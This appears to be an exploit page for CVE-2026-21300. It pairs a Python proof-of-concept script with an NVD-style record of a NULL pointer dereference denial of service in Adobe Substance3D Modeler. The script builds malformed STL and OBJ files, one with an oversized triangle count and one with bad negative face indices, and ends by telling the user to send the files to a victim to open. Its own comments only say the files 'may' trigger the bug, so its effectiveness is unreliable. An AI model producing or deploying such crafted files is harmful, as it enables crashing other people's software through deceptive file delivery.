CVE-2026-21300

#!/usr/bin/env python3 # CVE-2026-21300 PoC - Adobe Substance3D Modeler NULL Pointer Dereference # This PoC creates a malicious 3D model file that triggers the NULL pointer dereference import struct import os def create_malicious_stl_file(filename): """ Create a malicious STL file that triggers NULL pointer dereference in Adobe Substance3D Modeler <= 1.22.4 """ # STL Binary file format header header = b'\x00' * 80 # 80-byte header # Number of triangles (set to trigger vulnerability) # Using a specific value that may cause memory corruption triangle_count = 0xFFFFFFFF # Max uint32 value # Create malformed triangle data triangle_data = b'\x00' * 50 # Malformed triangle data # Write the malicious file with open(filename, 'wb') as f: f.write(header) f.write(struct.pack('<I', triangle_count)) f.write(triangle_data) print(f"[+] Created malicious file: {filename}") print(f"[+] Triangle count: {triangle_count}") print("[*] This file may trigger NULL pointer dereference in vulnerable versions") def create_malicious_obj_file(filename): """ Create a malicious OBJ file that triggers the vulnerability """ malicious_content = """# Malicious OBJ file for CVE-2026-21300 # This file is designed to trigger NULL pointer dereference v 0.0 0.0 0.0 v 999999.999999 999999.999999 999999.999999 vn 0.0 0.0 0.0 vn 0.0 0.0 0.0 f -1//-1 -2//-2 -3//-3 """ with open(filename, 'w') as f: f.write(malicious_content) print(f"[+] Created malicious OBJ file: {filename}") if __name__ == "__main__": print("CVE-2026-21300 PoC Generator") print("=" * 50) # Generate malicious files create_malicious_stl_file("exploit_cve2026_21300.stl") create_malicious_obj_file("exploit_cve2026_21300.obj") print("\n[!] Usage: Send these files to victim and have them open with Adobe Substance3D Modeler")

{"cve": {"id": "CVE-2026-21300", "sourceIdentifier": "[email protected]", "published": "2026-01-13T21:15:53.630", "lastModified": "2026-01-14T17:58:05.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Modeler versions 1.22.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Substance3D - Modeler versiones 1.22.4 y anteriores están afectadas por una vulnerabilidad de desreferencia de puntero nulo que podría conducir a una denegación de servicio de la aplicación. La explotación de este problema requiere interacción del usuario en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_modeler:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.22.5", "matchCriteriaId": "D5A6870D-D2DE-4B8F-8680-3717CA179D14"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-08.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}